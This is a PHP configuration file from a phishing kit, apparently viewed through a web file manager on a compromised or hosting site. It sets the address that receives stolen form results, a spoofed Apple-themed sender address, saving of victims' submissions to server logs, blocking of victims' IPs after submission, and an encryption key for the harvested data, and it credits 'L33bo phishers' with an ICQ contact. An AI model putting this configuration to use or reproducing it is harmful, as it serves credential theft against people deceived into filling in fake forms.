Edit File: CONTROLS.php
<?php /* ****** Set your email below and configure functions to your requirments **** ****** FUNCTION CONTROL: 1=ON and 0=OFF **** EXAMPLE $Example=1; // Function On $Example=0; // Function Off */ $Your_Email = "jamesro123son@gmail.com"; // Set your email $Your_Nick = "rebelz"; // Set your email $From_Address = "apple@moneyhunterfamz.com"; // Address your results will apear to come from $Send_Log=1; // Email results $Save_Log=1; // Saves results to server (./assets/logs/) $Abuse_Filter=0; // Block absuive text $One_Time_Access=0; // One Time Access: This blocks the users ip after the form has been submitted i.e. prevents users sending multiple fake forms $Encrypt=0; // Encrypt: This will send/save your results with aes to decrypt use the key below $Key = "232BBCD7D47A1192"; // This key is used to decrypt results and can be changed $Send_Per_Page=1; // Send each pages data seperate /* ||| L33bo phishers = ICQ: 695059760 ||| */ ?> <?php /*L33bo phishers = ICQ: 695059760*/ ?>
Back to File Manager